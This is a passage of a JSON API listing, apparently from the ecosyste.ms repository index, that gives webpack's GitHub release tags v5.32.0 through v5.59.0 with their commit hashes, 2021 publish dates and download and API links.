@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/t